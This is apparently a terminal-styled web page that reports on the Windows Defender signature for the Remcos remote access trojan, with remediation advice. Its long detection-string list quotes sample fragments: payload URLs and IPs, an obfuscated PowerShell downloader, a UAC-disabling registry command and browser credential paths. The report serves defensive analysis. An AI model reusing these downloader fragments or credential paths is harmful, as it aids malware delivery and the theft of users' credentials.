user@threatcheck.sh ~ threat-analysis
bash
$ analyze-threat Trojan:JS/Remcos!AMTB
Trojan:JS/Remcos!AMTB - Windows Defender threat signature analysis

Trojan:JS/Remcos!AMTB - Windows Defender Threat Analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:JS/Remcos!AMTB
Classification:
Type:Trojan
Platform:JS
Family:Remcos
Detection Type:Concrete
Known malware family with identified signatures
Suffix:!AMTB
Confidence:Very High
False-Positive Risk:Low

Concrete signature match: Trojan - Appears legitimate but performs malicious actions for JavaScript platform, family Remcos

Summary:

This is a concrete detection of Trojan:JS/Remcos, a JavaScript-based Remote Access Trojan (RAT). It aims to disable User Account Control (UAC), capture screenshots, and establish command-and-control (C2) communication to download further payloads, enabling extensive surveillance and system control.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat:
 - Remcos_Mutex_Inj (PEHSTR_EXT)
 - EnableLUA /t REG_DWORD /d 0 (PEHSTR_EXT)
 - getscrslist (PEHSTR_EXT)
 - screenshotdata (PEHSTR_EXT)
 - Breaking-Security.Net (PEHSTR_EXT)
 - Remcos_Mutex_Inj (PEHSTR)
 - REMCOS (PEHSTR_EXT)
 - Screenshots (PEHSTR_EXT)
 - remcos (PEHSTR_EXT)
 - Remcos (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\Uninstall (PEHSTR_EXT)
 - set_UseShellExecute (PEHSTR_EXT)
 - zdvT_i1jso3v7MtW0/es.uugu.a//:sptth (PEHSTR_EXT)
 - gdead/dead-lyrics/ (PEHSTR_EXT)
 - China_Cat_Sunflower.txt (PEHSTR_EXT)
 - \shell\open\command (PEHSTR_EXT)
 - OpenAs_RunDLL (PEHSTR_EXT)
 - Test.thg (PEHSTR_EXT)
 - sfhjffkfhgfdjsrfhhddfhfffadsgfasfhsscffgdb (PEHSTR_EXT)
 -   = CreateObject("Msxml2.DOMDocument.3.0") (MACROHSTR_EXT)
 - Load "http://185.172.110.217/robx/remit.jpg (MACROHSTR_EXT)
 - Pspl.Create(Nxayp, Null, Null, mh0f5) (MACROHSTR_EXT)
 - C:\Users\Yak\Desktop\Alt_R66Draw\T___imgFig.pas (PEHSTR_EXT)
 - C:\Users\Yak\Desktop\Alt_R66Draw\T__RGroup.pas (PEHSTR_EXT)
 - C:\Users\Yak\Desktop\Alt_R66Draw\T__RUndo.pas (PEHSTR_EXT)
 - C:\Users\Yak\Desktop\Alt_R66Draw\T__RSelFrm.pas (PEHSTR_EXT)
 - C:\Users\Yak\Desktop\Alt_R66Draw\T__RCore.pas (PEHSTR_EXT)
 - davidemauri.it (PEHSTR_EXT)
 - opablo@gmail.com (PEHSTR_EXT)
 - Decompress (PEHSTR_EXT)
 - Compress (PEHSTR_EXT)
 -  = MVNID.OpenTextFile(OGlq + "\ZrTSy.vbs", 8, True) (MACROHSTR_EXT)
 - Dir(f5fg0e + "\ZrTSy.vbs") = "" Then (MACROHSTR_EXT)
 - Nursery_Management_System.signIn.resources (PEHSTR_EXT)
 - Nursery_Management_System.sign.resources (PEHSTR_EXT)
 - Nursery_Management_System.signUp.resources (PEHSTR_EXT)
 - Nursery_Management_System.Analytics.resources (PEHSTR_EXT)
 - Nursery_Management_System.Properties.Resources.resources (PEHSTR_EXT)
 - Nursery_Management_System.childDailyDetails.resources (PEHSTR_EXT)
 - Nursery_Management_System.adminPendingRequests.resources (PEHSTR_EXT)
 - \AppData\Roaming\remcos\ (PEHSTR_EXT)
 - \AppData\Roaming\Screenshots\ (PEHSTR_EXT)
 - get_SplashScreen1 (PEHSTR_EXT)
 - DbCommand (PEHSTR_EXT)
 - Lerlibro_INC.ucUsers.resources (PEHSTR_EXT)
 - //107.189.4.70/693.bin (PEHSTR_EXT)
 - Jioz.NewFileForm.resources (PEHSTR_EXT)
 - Jioz.PropertiesForm.resources (PEHSTR_EXT)
 - HttpWebResponse (PEHSTR_EXT)
 - %systemroot%\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe (PEHSTR_EXT)
 - ttps:// (PEHSTR_EXT)
 - BreakingSecurity.net (PEHSTR_EXT)
 - Remcos restarted by watchdog (PEHSTR_EXT)
 - Remcos v (PEHSTR_EXT)
 - SbieDll.dll (PEHSTR_EXT)
 - HARDWARE\ACPI\DSDT\VBOX__ (PEHSTR_EXT)
 - \SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA (PEHSTR_EXT)
 - .exe (PEHSTR_EXT)
 - //cdn.discordapp.com/attachments/ (PEHSTR_EXT)
 - \Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe (PEHSTR_EXT)
 - SOFTWARE\Borland\Delphi\RTL (PEHSTR_EXT)
 - cdn.discordapp.com (PEHSTR_EXT)
 - C:\Users\Public\Libraries\TEMP (PEHSTR_EXT)
 - amsl.Run "P" + mJJGM(fgfjhfgfg), 0 (MACROHSTR_EXT)
 - = mJJGM("B0A85DF40" + fjjsdfhl() + j00ffdgdf() + tter7fdg0() (MACROHSTR_EXT)
 - &Microsoft.VisualBasic.CompilerServices (PEHSTR)
 - 4System.Web.Services.Protocols.SoapHttpClientProtocol (PEHSTR)
 - outCompiled.exe (PEHSTR)
 - System.CodeDom.Compiler (PEHSTR)
 - System.Security (PEHSTR_EXT)
 - ShutDownDlg.dll (PEHSTR_EXT)
 - \Software\Microsoft\Internet Explorer\Main (PEHSTR_EXT)
 - RunDlg.dll (PEHSTR_EXT)
 - CheckIC.dll (PEHSTR_EXT)
 - Remote_Administration_Tool.Properties.Resources (PEHSTR_EXT)
 - CaptureScreenImage.Properties.Resources (PEHSTR_EXT)
 - VB_blackjack.My.Resources (PEHSTR_EXT)
 - zCom.resources (PEHSTR_EXT)
 - .tmp.exe (PEHSTR_EXT)
 - PrimeX.Tools.Properties.Resources (PEHSTR_EXT)
 - shutdowntimer.Properties.Resources (PEHSTR_EXT)
 - Video_Capture_DonK.Properties.Resources (PEHSTR_EXT)
 - Ddd.Resources.resources (PEHSTR_EXT)
 - BaseConfigHandler.My.Resources (PEHSTR_EXT)
 - Stub.g.resources (PEHSTR_EXT)
 - SQLTutorial.Resources.resources (PEHSTR_EXT)
 - ndtia_Live_Server.Resources (PEHSTR_EXT)
 - Cards_Interfaces.My.Resources (PEHSTR_EXT)
 - ReflectionExtensions.My.Resources (PEHSTR_EXT)
 - MiniCalc.Resources (PEHSTR_EXT)
 - GameProject.My.Resources (PEHSTR_EXT)
 - PM_FormsAvgCalc.Resources (PEHSTR_EXT)
 - PointOfSale.Properties.Resources (PEHSTR_EXT)
 - Graph.Properties.Resources (PEHSTR_EXT)
 - IdOps.My.Resources (PEHSTR_EXT)
 - FileZillaProject.My.Resources (PEHSTR_EXT)
 - WindowsApp2.My.Resources (PEHSTR_EXT)
 - WindowsApplication1.My.Resources (PEHSTR_EXT)
 - ShaharMarket.Resources (PEHSTR_EXT)
 - Coursework.My.Resources (PEHSTR_EXT)
 - FixAPix.Resources (PEHSTR_EXT)
 - Image_Editor.Resources (PEHSTR_EXT)
 - Codewords.Resources.resources (PEHSTR_EXT)
 - GameMaker.Resources (PEHSTR_EXT)
 - CDA.My.Resources (PEHSTR_EXT)
 - Coronovirus.Coronovirus (PEHSTR_EXT)
 - file:/// (PEHSTR_EXT)
 - exe.rtpoz/061860176029740319/910917017564740319/stnemhcatta/moc.ppadrocsid.ndc//:sptth (PEHSTR_EXT)
 - first.Properties.Resources (PEHSTR_EXT)
 - Page_Restore.My.Resources (PEHSTR_EXT)
 - Singleton_Vote_Manager.Properties.Resources.resources (PEHSTR_EXT)
 - Remcos restarted by watchdog! (PEHSTR_EXT)
 - ExceptionDispatch.Properties.Resources (PEHSTR_EXT)
 - GraphicsUtility.Properties.Resources (PEHSTR_EXT)
 - blue32_c.exe (PEHSTR_EXT)
 - FoxGameOfLife.My.Resources (PEHSTR_EXT)
 - tela_inicial.My.Resources (PEHSTR_EXT)
 - WaterBilingSystem.Main.resources (PEHSTR_EXT)
 - costura. (PEHSTR_EXT)
 - .dll (PEHSTR_EXT)
 - .compressed (PEHSTR_EXT)
 - diejc.dll (PEHSTR_EXT)
 - C:\TEMP\ns (PEHSTR_EXT)
 - ExecShell (PEHSTR_EXT)
 - %s%s.dll (PEHSTR_EXT)
 - money.Strategies (PEHSTR_EXT)
 - money.exe (PEHSTR_EXT)
 - .Definitions (PEHSTR_EXT)
 - .Attributes (PEHSTR_EXT)
 - .Properties (PEHSTR_EXT)
 - stub\UopyEx\achiiMe (PEHSTR_EXT)
 - JustChess.Properties (PEHSTR_EXT)
 - \kiichi\work\ImageResizeTest\geo-elevation.png (PEHSTR_EXT)
 - 127.0.0.1:8081 (PEHSTR_EXT)
 - OQDXkW<_(V?cqK.lJ>-*y&zv9prf8biYCFeMxBm6ZnG3H4OuS1UaI5TwtoA#Rs!,7d2@L^gNhj)EP$0 (PEHSTR)
 - UCOMIExpando (PEHSTR_EXT)
 - ComputeHash (PEHSTR_EXT)
 - PolTraget.vbp (PEHSTR_EXT)
 - students_and_employees.ToggleState (PEHSTR_EXT)
 - trevnoC.metsyS (PEHSTR_EXT)
 - HttpWebRequest (PEHSTR_EXT)
 - /store2.gofile.io/download/ (PEHSTR_EXT)
 - FastFind.Properties.Resources (PEHSTR_EXT)
 - Sy!stem.Refl!ection.As!sembly (PEHSTR_EXT)
 - commdlg_FindReplace (PEHSTR_EXT)
 - Mqypdx\egc (PEHSTR_EXT)
 - WinHttpCrackUrl (PEHSTR_EXT)
 - Read Icon List for Delphi 3.0 (PEHSTR_EXT)
 - uplooder.net (PEHSTR_EXT)
 - wener/ gifnocpi (PEHSTR_EXT)
 - esaeler/ gifnocpi (PEHSTR_EXT)
 - laxyman.000webhostapp.com (PEHSTR_EXT)
 - .edom SOD ni nur eb tonnac margorp sihT! (PEHSTR_EXT)
 - coler. (PEHSTR_EXT)
 - crsr. (PEHSTR_EXT)
 - txet. (PEHSTR_EXT)
 - DllRegisterServer (PEHSTR_EXT)
 - LibrarySystem.Properties.Resources (PEHSTR_EXT)
 - exe.4ewrepooc (PEHSTR_EXT)
 - car_rental.Properties.Resources (PEHSTR_EXT)
 - moc.ppadrocsid.ndc//:sptth (PEHSTR_EXT)
 - GetExecutingAssembly (PEHSTR_EXT)
 - BeeHiveManagementSystem.Properties.Resources (PEHSTR_EXT)
 - /stnemhcatta/moc.ppadrocsid.ndc//:sptth (PEHSTR_EXT)
 - gdgasfwq.gdgasfwq (PEHSTR_EXT)
 - http://trietlongvinhvien.info/.tmb/ (PEHSTR_EXT)
 - https://www.uplooder.net/img/image/40/e36bebd22260c03f3a40b6348976fa5b/WMI-Provider-Host.jpg (PEHSTR_EXT)
 - https://cdn.discordapp.com/attachments/932413459872747544/933098893019861042/Jdnpanki.bin (PEHSTR_EXT)
 - http://trietlongvinhvien.info//.tmb/ (PEHSTR_EXT)
 - EmlakOtomasyonu.Properties.Resources (PEHSTR_EXT)
 - exe.kcad/tdba/171.571.34.971//:ptth (PEHSTR_EXT)
 - transfer.sh/get/dXGcIL/bbddll.txt (PEHSTR_EXT)
 - transfer.sh/get/xwYA0C/ch.txt (PEHSTR_EXT)
 - Wp1.Form1.resources (PEHSTR_EXT)
 - telDir.Resources (PEHSTR_EXT)
 - S#q-}=6{)BuEV[GDeZy>~M5D/P&Q}7< (PEHSTR_EXT)
 - CompressionLevel (PEHSTR_EXT)
 - calina-crack.store/loader/uploads/services_Vxnwfiwc.bmp (PEHSTR_EXT)
 - 91.243.44.142/arx-777Ofdds_Suadocfq.png (PEHSTR_EXT)
 - uplooder.net/img/image/48/0eda3c83452f40cb3b4ba01965a35433/Fkned.jpg (PEHSTR_EXT)
 - vkcgroups.com/loader/uploads/Quote_Wdmahgcs.jpg (PEHSTR_EXT)
 - x.rune-spectrals.com/loader/uploads/GxvGhjKm_Gxvwanla.jpg (PEHSTR_EXT)
 - 91.243.44.142/pl-Ukxamliyg_Wqxbcfti.png (PEHSTR_EXT)
 - kotadiainc.com (PEHSTR_EXT)
 - philox.ddns.net (PEHSTR_EXT)
 - SmallestEnclosingCircle.Properties.Resources (PEHSTR_EXT)
 - CompressionMode (PEHSTR_EXT)
 - "powe" + "rs" + Range("F100").Value (MACROHSTR_EXT)
 - ggg.ExecMethod_(HByn(), f8df00) (MACROHSTR_EXT)
 - "C" + ActiveSheet.PageSetup.LeftFooter + fjjdf() (MACROHSTR_EXT)
 - CreateObject(ActiveSheet.PageSetup.CenterHeader) (MACROHSTR_EXT)
 - ZIARb().Exec kogH3 (MACROHSTR_EXT)
 - For Each ZvFDlwx In ActiveWorkbook.BuiltinDocumentProperties (MACROHSTR_EXT)
 - = "p" + ActiveSheet.PageSetup.CenterFooter (MACROHSTR_EXT)
 - cAlHep.Open (rNJoz + "\afJNP.js") (MACROHSTR_EXT)
 - ActiveSheet.OLEObjects(1).Copy (MACROHSTR_EXT)
 - MEDIA\GFX\LittleDuck.bmp (PEHSTR_EXT)
 - MEDIA\GFX\GaugeKill.bmp (PEHSTR_EXT)
 - .itext (PEHSTR_EXT)
 - Cortez.Properties.Resources (PEHSTR_EXT)
 - ='eW.teN tc' + 'ejbO-weN(';$Ax1='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.dapeton\''+pmet:vne$,''sbv.tneilC detcetorP/ababila/kt.denik//:ptth''( (MACROHSTR_EXT)
 - bdfdf=t8g0f.open(v0df+"\citwz.bat")endfunctionfunctionrev(s)dimpforp=len(s)to1step-1rev=rev&mid(s,p,1)nextendfunctionfunctionikfwq() (MACROHSTR_EXT)
 - omwmlf=pathy+"\citwz.bat"'youcanspecifyherethetextfilenameyouwanttocreate (MACROHSTR_EXT)
 - =range("a1").valueendfunction (MACROHSTR_EXT)
 - .self.invokeverb"pa"+"ste"endfunctionprivatefunction (MACROHSTR_EXT)
 - .open( (MACROHSTR_EXT)
 - .j"+"s")endsubsub (MACROHSTR_EXT)
 - constuser_profile=&h28&activesheet.oleobjects(1).copyset (MACROHSTR_EXT)
 - //209.127.20.13/ (MACROHSTR_EXT)
 - .xm*w (SNID)
 - =createobject(adlnw())setwyyss=iwxn.methods_(activesheet.pagesetup.leftheader)._ (MACROHSTR_EXT)
 - ggg,f8df00)setsjtn=ggg.execmethod_(zcfw(),f8df00)endfunctionprivatefunctionfjjdf()fjjdf= (MACROHSTR_EXT)
 - .methods_(activesheet.pagesetup.leftheader)._ (MACROHSTR_EXT)
 - +fjjdf()endfunctionfunctionfkldf(ggg,f8df00)setsjtn=ggg.execmethod_( (MACROHSTR_EXT)
 - ://loft.london/vendor/phpunit/phpunit/src/Util/PHP/oder.exe (MACROHSTR_EXT)
 - TripleDESCryptoServiceProvider (PEHSTR_EXT)
 - Othubpm.exe (PEHSTR_EXT)
 - rundll32.exe %sadvpack.dll,DelNodeRunDLL32 (PEHSTR_EXT)
 - rundll32.exe %s,InstallHinfSection %s 128 %s (PEHSTR_EXT)
 - cmd /c cmd < (PEHSTR_EXT)
 - .htm & ping -n 5 localhost (PEHSTR_EXT)
 - Command.com /c %s (PEHSTR_EXT)
 - Software\Microsoft\Windows\CurrentVersion\RunOnce (PEHSTR_EXT)
 - 214da9226666a1.Resources.resources (PEHSTR_EXT)
 - SimulationRemonteeSki.T1.resources (PEHSTR_EXT)
 - Invoke-WebRequest -Uri ""https://transfer.sh/get/qIND4E/Rchnpc.exe"" -OutFile (MACROHSTR_EXT)
 - 80.66.75.36 (PEHSTR_EXT)
 - cmd /c cmd < Preferences.vsd & ping -n 5 localhost (PEHSTR_EXT)
 - LkXE.exe (PEHSTR_EXT)
 - 2023CryptsDone\DarkModeForms\obj\Debug\DarkModeForms.pdb (PEHSTR_EXT)
 - _Header_dllink (PEHSTR_EXT)
 - war.pdb (PEHSTR_EXT)
 - FileRenamer\obj\Debug\FIco.pdb (PEHSTR_EXT)
 - RestaurantApp.AccountControl (PEHSTR_EXT)
 - RestaurantApp.ContactControl (PEHSTR_EXT)
 - RestaurantApp.DefaultControl (PEHSTR_EXT)
 - RestaurantApp.LoginControl (PEHSTR_EXT)
 - RestaurantApp.MenuControl (PEHSTR_EXT)
 - RestaurantApp.NutritionControl (PEHSTR_EXT)
 - RestaurantApp.RestaurantControl (PEHSTR_EXT)
 - RestaurantApp.WelcomeControl (PEHSTR_EXT)
 - SolaraBootstrapper\bin\Release\Bootstrapper.pdb (PEHSTR_EXT)
 - sgfhjffffgdhjsrfhddfhfffaddsfsfsscfgdb (PEHSTR_EXT)
 - CRM02.Properties.Resources.resources (PEHSTR_EXT)
 - CRM02.Properties (PEHSTR_EXT)
 - sfhjffkfhgfdjsrfhdfdfhfffadsgfahsscffgdb (PEHSTR_EXT)
 - WindowsFormsApp50.Properties.Resources.resource (PEHSTR_EXT)
 - Documents\CryptoObfuscator_Output\BHHHG66.pdb (PEHSTR_EXT)
 - QnovDRkgfnoOaikMMsqL.res (PEHSTR_EXT)
 - sgfhjffffgdhjsrfhddfhfffadfsfsscfgdb (PEHSTR_EXT)
 - RandomMaker.Properties.Resources (PEHSTR_EXT)
 - 5Assembled.Program (PEHSTR_EXT)
 - Njswpsg (PEHSTR_EXT)
 - %homedrive%\eegv (PEHSTR_EXT)
 - ;r. X( (SNID)
 - :/Users/Admin/AppData/Roaming/installer/installer/main.go (PEHSTR_EXT)
 - geoplugin.net/json.gp (PEHSTR_EXT)
 - sysinfo.txt (PEHSTR_EXT)
 - update.vbs (PEHSTR_EXT)
 - fso.DeleteFile (PEHSTR_EXT)
 - WNHBNMKL.exe (PEHSTR_EXT)
 - cdn.discordapp.com/attachments/ (PEHSTR_EXT)
 - Zptcs.exe (PEHSTR_EXT)
 - Failed to execute the .bat file (PEHSTR_EXT)
 - cmd/Cstart/B (PEHSTR_EXT)
 - jenkins-workspace\workspace\client-builder-product\Build\Win32\Release\utorrent.pdb (PEHSTR_EXT)
 - =[/"{ (SNID)
 - MeshViewer.MeshViewer.resources (PEHSTR_EXT)
 - NotThere.Properties.Resources.resources (PEHSTR_EXT)
 - https://github.com/Saad888/AutoSynthesis/issues (PEHSTR_EXT)
 - MagicBar.Properties.Resources (PEHSTR_EXT)
 - https://groundbreakingsstyle.com/wp-content/nanofolder/img-files/VFLient.vas (PEHSTR_EXT)
 - OxyPlotting.EWGibraltar (PEHSTR_EXT)
 - C:\Users\Administrator\Desktop\Outputs\YgZBrsLNe.pdb (PEHSTR_EXT)
 - AsnanyDentalClinic.Properties (PEHSTR_EXT)
 - dobbelteksponeringer\Microsoft\Windows\horizontical\Uninstall\spalteteksternes (PEHSTR_EXT)
 - vandrerkortet\Angrebstidspunktet\indonesiens (PEHSTR_EXT)
 - unsped\akkorderingernes (PEHSTR_EXT)
 - schtasks /create /tn "Alis Cloud" /tr " (PEHSTR_EXT)
 - X{gJ. (SNID)
 - w124728_New_Text_Document.txt (PEHSTR_EXT)
 - https://imgurl.ir/download.php (PEHSTR_EXT)
 - Project_Calendar.Properties.Resources.resources (PEHSTR_EXT)
 - Kronus.exed (PEHSTR_EXT)
 - Kronus.dll (PEHSTR_EXT)
 - bcrypt.dll (PEHSTR_EXT)
 - FManagerApp.Properties.Resources (PEHSTR_EXT)
 - CS50_Medical_App.Welcome.resources (PEHSTR_EXT)
 - 2023CryptsDone\drwk (PEHSTR_EXT)
 - exporterWorker_RunWorkerCompleted (PEHSTR_EXT)
 - lameExeDownloadSite (PEHSTR_EXT)
 - pwsgl3.Properti (PEHSTR_EXT)
 - reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System (PEHSTR_EXT)
 - User Data\Default\Cookies (PEHSTR_EXT)
 - CreateObject("WScript.Shell").Run "cmd (PEHSTR_EXT)
 - \sysinfo.txt (PEHSTR_EXT)
 - SOFTWARE\Microsoft\Windows NT\CurrentVersion (PEHSTR_EXT)
 - Remcos Agent initialized (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Default\Login Data (PEHSTR_EXT)
 - \AppData\Local\Google\Chrome\User Data\Default\Cookies (PEHSTR_EXT)
 - AppData\Roaming\Mozilla\Firefox\Profiles\ (PEHSTR_EXT)
 - \logins.json (PEHSTR_EXT)
 - \key3.db (PEHSTR_EXT)
 - ToDoList.Properties.Resources.resources (PEHSTR_EXT)
 - Projektni_zadatak.Properties.Resources (PEHSTR_EXT)
 - AttendanceTracker.Properties.Resources.resources (PEHSTR_EXT)
 - QLBH.Properties.Resources.resources (PEHSTR_EXT)
 - PitchAnalytics.Properties.Resources (PEHSTR_EXT)
 - Book_Mgt_System.Properties.Resources.resources (PEHSTR_EXT)
 - Execute (PEHSTR_EXT)
 - Slicer.Properties.Resources.resources (PEHSTR_EXT)
 - Cycle_Jump_Game.Properties.Resources.resources (PEHSTR_EXT)
 - StormCast.Properties.Resources.resources (PEHSTR_EXT)
 - 32\A.DLL (PEHSTR_EXT)
 - SmartNote.Properties.Resources (PEHSTR_EXT)
 - CSVViewer.Forms.MainForm.resource (PEHSTR_EXT)
 - Source_code.Properties.Resources (PEHSTR_EXT)
 - HostPinger.Properties.Resources (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
Known malware which is associated with this threat:
Filename: 1303bf5504a5d6c2a717815dc5a0aa36285cff6438f562d4928c47ec49c6dd64.hta
1303bf5504a5d6c2a717815dc5a0aa36285cff6438f562d4928c47ec49c6dd64
25/12/2025
VirusTotalDownload Sample
Filename: 626ec1fa145051853e353adf624e2cf4227564c156c1c6cf72f2546fc7d25460.ps1
626ec1fa145051853e353adf624e2cf4227564c156c1c6cf72f2546fc7d25460
25/12/2025
VirusTotalDownload Sample
Filename: 93e255283db179c074c917be8e99cdd4b7aa8cc7c6eea2c811dab9ec980bb83e.ps1
93e255283db179c074c917be8e99cdd4b7aa8cc7c6eea2c811dab9ec980bb83e
25/12/2025
VirusTotalDownload Sample
Filename: f79c06795ae5144703e4e4d14424f944f26625e77ec20c802fa3ca47cc4659bf.ps1
f79c06795ae5144703e4e4d14424f944f26625e77ec20c802fa3ca47cc4659bf
25/12/2025
VirusTotalDownload Sample
Remediation Steps:
Immediately isolate the infected system from the network. Perform a full system scan with updated antivirus, remove all detected threats, and block associated malicious IPs (e.g., 185.172.110.217) at the network perimeter. Due to the nature of RATs, a full system reimage is strongly recommended after backing up essential data, and all user credentials used on the compromised machine should be reset.
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 25/12/2025. Do you want to analyze it again?
$ ls available-commands/
→ cd /home
user@threatcheck.sh:~$